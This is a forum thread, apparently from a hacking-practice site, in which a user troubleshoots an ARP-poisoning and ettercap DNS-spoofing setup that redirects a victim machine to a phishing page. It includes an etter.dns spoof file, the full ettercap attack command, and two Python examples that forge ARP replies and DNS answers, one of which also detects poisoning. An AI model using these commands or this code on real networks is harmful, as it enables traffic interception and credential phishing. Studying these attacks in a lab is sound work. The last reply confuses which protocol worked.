ARP poisoning and spoofing

taslim
9 years ago

0

Hi,

I am testing the ARP poisoning and spoofing method with this tutorial: http://www.arppoisoning.com/demonstrating-an-arp-poisoning-attack/
However, I have a problem at step 5.
On my second machine (the victim), when I visit a website, it's my own localhost page (the victim's page) that shows, and not my site on my attacking machine.

Do you know why?

Thanks for your help.

16 replies
5 voices
336 views
1st1
9 years ago | edited 9 years ago

0

First of all, it's a bit confusing to understand which machine is meant, so I will use the following abbreviations:

  • M1: the attacker
  • M2: the victim

If I understood you correctly, you want to get to M1's localhost page via M2. This isn't possible because 127.0.0.1, a.k.a. localhost, always refers to your own machine (exception: see below), so if you visit localhost on M2 you get the M2 localhost page. (localhost is also known as the loopback address.) So the traffic never leaves the victim's (M2) PC. (And this is why you can access localhost web pages without having an internet connection.)

There is a possible solution to change this localhost/loopback behaviour, but it needs more access on your victim's machine (incl. root access).

But when I skim through this tutorial, I don't see a point that says "now visit localhost with the victim's (M2) PC". Instead you host e.g. a phishing site, and when M2 wants to access this web page (via the web browser) it shows the page that is from M1.

taslim
9 years ago

0

[quote=author]If I understood you correctly, you want to get to M1's localhost page via M2. This isn't possible because 127.0.0.1, a.k.a. localhost, always refers to your own machine (exception: see below), so if you visit localhost on M2 you get the M2 localhost page. (localhost is also known as the loopback address.) So the traffic never leaves the victim's (M2) PC. (And this is why you can access localhost web pages without having an internet connection.)

There is a possible solution to change this localhost/loopback behaviour, but it needs more access on your victim's machine (incl. root access)[/quote]Yes, I agree with that.

[quote=author]But when I skim through this tutorial, I don't see a point that says "now visit localhost with the victim's (M2) PC". Instead you host e.g. a phishing site, and when M2 wants to access this web page (via the web browser) it shows the page that is from M1.[/quote]
Sorry for my English, it's not my first language...
For example:
In Google, I type "test" and select the first link from M2, but it displays "This webpage is not available", whereas I want M2 to be led to the phishing site.

How can I do this?
Thank you for your help :)

taslim
9 years ago

0

Nobody knows?

Mugi [Mugiwara27]
9 years ago

0

I understood what you mean, taslim, and it's possible. You can do something like that with the "hosts" file on Windows computers, so you can do this:

  • The attacker does ARP spoofing
  • He changes google.com to his phishing web page
  • When the victim goes to google.com, he'll see that the URL is google.com but actually he'll be on the phishing page

Did you mean that?
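The first step in the list above, the ARP spoof itself, is just unsolicited ARP replies that pair somebody else's IP with the attacker's MAC. The block below is an added example for this thread (not from the tutorial or any of the posters): it forges those replies at the frame level with `struct`, decodes them the way a sniffer would, and flags the conflict that gives the attack away on a capture. The gateway, victim (M2) and attacker (M1) addresses are constructed lab values, and nothing is sent on the wire.

```python
"""ARP poisoning at the frame level: forge the ARP replies an attacker (M1) sends,
decode them the way a sniffer would, and flag the IP-to-MAC conflicts that give
the attack away. Added example for this thread; all addresses are constructed."""
import struct

ETH_P_ARP = 0x0806      # EtherType for ARP
ARP_HTYPE_ETHER = 1
ARP_PTYPE_IPV4 = 0x0800
ARP_OP_REPLY = 2

# Constructed lab addresses (not from the thread).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "aa:bb:cc:00:00:20"   # M2
ATTACKER_MAC = "00:0c:29:11:22:33"                            # M1


def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an unsolicited ARP reply: 'sender_ip is at sender_mac'.
    A poisoned reply simply puts the attacker's MAC in sender_mac next to someone else's IP."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", ARP_HTYPE_ETHER, ARP_PTYPE_IPV4, 6, 4, ARP_OP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet+ARP frame into its fields (what Wireshark shows you)."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    body = frame[22:]

    def fmt_mac(b: bytes) -> str:
        return ":".join(f"{x:02x}" for x in b)

    def fmt_ip(b: bytes) -> str:
        return ".".join(str(x) for x in b)

    return {
        "op": op,
        "sender_mac": fmt_mac(body[0:hlen]),
        "sender_ip": fmt_ip(body[hlen:hlen + plen]),
        "target_mac": fmt_mac(body[hlen + plen:2 * hlen + plen]),
        "target_ip": fmt_ip(body[2 * hlen + plen:2 * hlen + 2 * plen]),
    }


def find_poisoning(frames) -> dict:
    """Return {ip: {macs}} for every IP claimed by more than one MAC in ARP replies.
    On a clean LAN each IP maps to exactly one MAC; a second claimant is the poisoner."""
    claims = {}
    for frame in frames:
        fields = parse_arp(frame)
        if fields["op"] != ARP_OP_REPLY:
            continue
        claims.setdefault(fields["sender_ip"], set()).add(fields["sender_mac"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed capture: two honest replies, then the attacker's two forged ones
# (one lying to the victim about the gateway, one lying to the gateway about the victim).
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
]

if __name__ == "__main__":
    for ip, macs in find_poisoning(SAMPLE_FRAMES).items():
        print(f"{ip} claimed by {sorted(macs)}")
```

Both forged frames are needed for a full man-in-the-middle (the victim must send to the attacker, and the gateway must send replies back to the attacker), which is also why a capture taken with Wireshark shows the same IP advertised by two MACs: that duplicate-address condition is exactly what Wireshark's own ARP expert warning keys on.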

taslim
9 years ago | edited 9 years ago

0

Thank you for your answer.

[quote=author]Did you mean that?[/quote]
Yes, that's it! But when I go to the website "google.com" from my victim's machine (M2), the phishing page is not found. The browser displays: "This webpage is not available".
I don't know why.... I followed the tutorial step by step and it isn't the same result. Can you tell me why?

If you have time, test it for me and explain it to me.

Thanks.

Mugi [Mugiwara27]
9 years ago

0

Oh, so you'll love this website:

http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding-Man-in-the-Middle-Attacks-ARP-Part1.html

Good explanation of how MITM works and how to do some exercises :)

taslim
9 years ago | edited 9 years ago

0

Hi,

Thanks for the site.
I read "Understanding Man-In-The-Middle Attacks Part 2: DNS Spoofing".

This is my etter.dns:
[quote=etter.dns]
yahoo.com A IP_ATTACK
*.yahoo.com A IP_ATTACK
[/quote]

Then I run the command: sudo ettercap -i en0 -T -q -P dns_spoof -M arp ////
In my shell:
[quote=shell]
dns_spoof: A [www.yahoo.com] spoofed to [IP_ATTACK]
dns_spoof: A [fr.yahoo.com] spoofed to [IP_ATTACK]
[…]
[/quote]

But on the victim's machine, it's not the phishing page that displays, it's the official yahoo.com page.

Can you tell me why, please?

dloser
9 years ago

0

If you had the browser open and visited the page before, the IP address has probably been cached.

You might want to check out Wireshark or something to get a better view, so you can figure most of this stuff out on your own.
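To tie together taslim's etter.dns post (the `yahoo.com` / `*.yahoo.com` A rules and the `dns_spoof: A [...] spoofed to [...]` lines) and dloser's point about the cached IP, here is an added example for this thread. It is not ettercap's code: it approximates the plugin's rule matching with a shell-style wildcard (an assumption about ettercap's exact semantics), builds the forged DNS answer the victim's stub resolver would accept, and then shows from the victim's side why a genuine answer still within its TTL is returned from cache without any query ever reaching the wire. The etter.dns text, the attacker IP `192.168.1.10` (standing in for `IP_ATTACK`) and the cached upstream IP `203.0.113.5` are constructed values.

```python
"""How ettercap's dns_spoof matching and a forged DNS answer fit together, and why a
still-valid cached answer on the victim makes the spoof invisible. Added example for
this thread, not ettercap's code; the etter.dns text, the attacker IP 192.168.1.10
(standing in for IP_ATTACK) and the cached upstream IP 203.0.113.5 are constructed."""
import fnmatch
import struct

ETTER_DNS = """\
# constructed etter.dns in the same format as the thread's
yahoo.com        A    192.168.1.10
*.yahoo.com      A    192.168.1.10
www.facebook.com PTR  192.168.1.10
"""

QTYPE_A = 1


def parse_etter_dns(text: str) -> list:
    """Return (name, type, value) rules, skipping comments and blank lines."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, rtype, value = line.split()
        rules.append((name.lower(), rtype.upper(), value))
    return rules


def match_rule(rules: list, qname: str, rtype: str = "A"):
    """First rule whose name matches qname. '*' is treated as a shell wildcard (assumed
    to approximate ettercap), so '*.yahoo.com' covers fr.yahoo.com but NOT the bare
    'yahoo.com', which is why the file needs both lines."""
    qname = qname.lower().rstrip(".")
    for name, rule_type, value in rules:
        if rule_type == rtype and fnmatch.fnmatchcase(qname, name):
            return value
    return None


def encode_name(name: str) -> bytes:
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode() for label in labels) + b"\x00"


def build_query(txid: int, qname: str, qtype: int = QTYPE_A) -> bytes:
    """Standard recursive query, one question, no answers (what the victim's stub sends)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(packet: bytes):
    txid = struct.unpack("!H", packet[:2])[0]
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    pos += 1                                   # skip the terminating zero label
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    return txid, ".".join(labels), qtype, packet[12:pos + 4]


def forge_response(query: bytes, rules: list, ttl: int = 300):
    """Answer the query with the attacker's IP if an etter.dns A rule matches, else None.
    Same transaction ID and question section, so the stub accepts it as the reply."""
    txid, qname, qtype, question = parse_query(query)
    if qtype != QTYPE_A:
        return None
    ip = match_rule(rules, qname, "A")
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)    # response, RD+RA, 1 answer
    rr = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, 1, ttl, 4)   # name = pointer to offset 12
    return header + question + rr + bytes(int(p) for p in ip.split("."))


class StubCache:
    """Minimal positive cache. While a genuine answer's TTL is alive the victim never
    sends a query, so there is nothing on the wire for dns_spoof to answer."""
    def __init__(self):
        self._entries = {}

    def put(self, name: str, ip: str, ttl: int, now: int):
        self._entries[name.lower()] = (ip, now + ttl)

    def get(self, name: str, now: int):
        entry = self._entries.get(name.lower())
        return entry[0] if entry and now < entry[1] else None


def resolve(name: str, cache: StubCache, rules: list, now: int):
    """Victim-side view: returns (ip, source) with source 'cache', 'spoofed' or 'upstream'."""
    cached = cache.get(name, now)
    if cached:
        return cached, "cache"
    response = forge_response(build_query(0x1234, name), rules)
    if response is None:
        return None, "upstream"          # no rule matched: the real resolver answers instead
    return ".".join(str(b) for b in response[-4:]), "spoofed"
```

Two practical consequences follow from the code: a browser that already has `www.yahoo.com` resolved (or an OS resolver cache with a live entry) will keep reaching the real site until the TTL expires or the cache is flushed, and a rule list without the bare `yahoo.com` entry will spoof every subdomain but not the apex name the user actually types.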

taslim
9 years ago

0

Finally! It works for websites that are not using HTTPS; is that normal?

dloser
9 years ago

0

Not sure what you’ve set up, but yes, HTTPS requires some more work.

taslim
9 years ago

0

I don't understand why it doesn't work for the HTTPS protocol.
In the file etter.dns, for example:
[quote=author]
www.facebook.com A ATTACK's IP
facebook.com A ATTACK's IP
www.facebook.com PTR ATTACK's IP
[/quote]
This attack redirects the victim's machine to the web server (the attacking machine, with the phishing website) when the user types www.facebook.com or facebook.com in the address bar.
So normally this attack bypasses HTTPS, because the user is redirected before loading the true page.

Do you agree with that?

dloser
9 years ago

0

It's very hard for me to understand your sentences. All I can say is that what I meant is that to set up HTTPS you have to do some more work. (And if you don't want to get certificate warnings/errors, it only gets a lot harder...)

taslim
9 years ago

0

OK, thank you, and sorry for my English.
I will come back better ;)

Mugi [Mugiwara27]
9 years ago

0

@dloser I think he meant that when he wants to do ARP / DNS spoofing on his local network, he can't do it with HTTPS websites (Google / Facebook / Hackthis ...).
[quote=dloser]
All I can say is that what I meant is that to set up HTTPS you have to do some more work
[/quote]
What about that "some more work"? :)

tehron
9 years ago

0

@dloser, I think @Mugiwara27 meant that @taslim meant that when he wants to do ARP / DNS spoofing on his local network, he can't do it with HTTPS websites (Google / Facebook / Hackthis ...).

Should be pretty clear now! ^^

dloser
9 years ago

0

Not sure why HTTP isn't working for you, @tehron; that is usually the easier protocol compared to HTTPS (which you did get to work, if I understood you correctly).
